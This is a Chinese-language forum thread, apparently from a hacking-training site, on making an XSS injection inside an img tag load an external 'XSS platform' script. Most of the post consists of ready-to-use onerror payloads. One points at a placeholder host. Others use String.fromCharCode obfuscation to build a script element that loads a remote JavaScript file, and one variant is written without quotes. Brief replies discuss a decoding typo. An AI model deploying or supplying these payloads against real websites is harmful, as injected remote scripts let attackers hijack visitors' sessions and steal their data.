資源共享吧|易語言論壇|逆向破解教程|輔助開發(fā)教程|網(wǎng)絡(luò)安全教程|www.rigasin.com|我的開發(fā)技術(shù)隨記

標(biāo)題: XSS漏洞如何在標(biāo)簽內(nèi)調(diào)用xss平臺鏈接 [打印本頁]
作者: 我愛ZP    時(shí)間: 2020-3-6 17:53
標(biāo)題: XSS漏洞如何在標(biāo)簽內(nèi)調(diào)用xss平臺鏈接
XSS漏洞如何在標(biāo)簽內(nèi)調(diào)用xss平臺鏈接


<iMg/sRc=1 onerror=1=//www.xxx.com/xxx.js>
今天有學(xué)員問如何在標(biāo)簽內(nèi)調(diào)用XSS平臺鏈接,問這樣在標(biāo)簽內(nèi)寫上js的網(wǎng)址可以執(zhí)行嗎?答:不行,因?yàn)閛nerror內(nèi)聯(lián)事件,寫javascript語法。


(, 下載次數(shù): 91)

解決辦法:
<img/src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)">

無引號版payload:
<img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)})()>


ZP培訓(xùn):http://www.rigasin.com/thread-10128-1-1.html

課程截圖:
(, 下載次數(shù): 90)

(, 下載次數(shù): 89)

作者: bkywt1277    時(shí)間: 2020-3-6 18:17
這個(gè)編碼轉(zhuǎn)換后是    (, 下載次數(shù): 88) 少了t是你筆誤嘛  是的話我在加上這些編碼
作者: 我愛ZP    時(shí)間: 2020-3-6 18:49
如圖
作者: 我愛ZP    時(shí)間: 2020-3-6 18:50
bkywt1277 發(fā)表于 2020-3-6 18:17
這個(gè)編碼轉(zhuǎn)換后是    少了t是你筆誤嘛  是的話我在加上這些編碼

如圖
作者: bkywt1277    時(shí)間: 2020-3-6 22:22
好的 謝謝




歡迎光臨 資源共享吧|易語言論壇|逆向破解教程|輔助開發(fā)教程|網(wǎng)絡(luò)安全教程|www.rigasin.com|我的開發(fā)技術(shù)隨記 (http://www.rigasin.com/) Powered by Discuz! X3.4